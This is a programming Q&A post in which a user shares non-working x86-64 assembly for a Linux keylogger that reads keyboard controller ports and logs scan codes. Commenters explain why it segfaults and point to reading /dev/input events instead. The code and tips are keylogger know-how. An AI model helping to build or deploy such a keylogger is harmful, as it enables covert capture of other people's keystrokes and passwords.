# Linux keylogger

Tags: linux, x86-64, system-calls, keylogger

I make a keylogger for Linux 64-bit reading directly the hardware keyboard controller port 60h and 64h and with sys calls however my keylogger don't even create the log and show the segmentation fault message. This is the source of the keylogger that i make:

```
MOV RAX,85
MOV RDI,FILE_NAME
MOV RSI,0
INT 80h
MOV [FD],RAX

MOV RAX,173
MOV RDI,60h
MOV RSI,1
INT 80h

MOV RAX,173
MOV RDI,64h
MOV RSI,1
INT 80h

KEYLOGGER:

L0:
CALL GET_SCAN_CODE
MOV BYTE[SCAN_CODE],AL

MOV RDI,[FD]
LEA RSI,[SCAN_CODE]
MOV RDX,1
MOV RAX,1
INT 80h

JMP L0

GET_SCAN_CODE:
IN AL,64h
AND AL,21h
CMP AL,1
JNZ GET_SCAN_CODE
CALL DELAY
IN AL,60h
RET
```

I am using TAILS. Where is the error at my source above.

Comment: You're running this in user-space?  You didn't comment your code and I don't have `__NR_ioperm` memorized, but obviously you need that (and root) or else `in` will segfault.  Use `strace` to check your system calls.  Also, BIOS keyboard emulation is long gone after boot; this won't get anything except maybe from a physical PS/2 keyboard.  Read from `/dev/input/...` for HID events under Linux because you *don't* want to write your own USB stack that interposes itself between the HW and Linux.

Comment: Also, [What happens if you use the 32-bit int 0x80 Linux ABI in 64-bit code?](//stackoverflow.com/q/46087730).  Comment your code and use a debugger and/or strace to see which instruction faults, and what happened with each of the system calls before that, especially if you want other people to help you.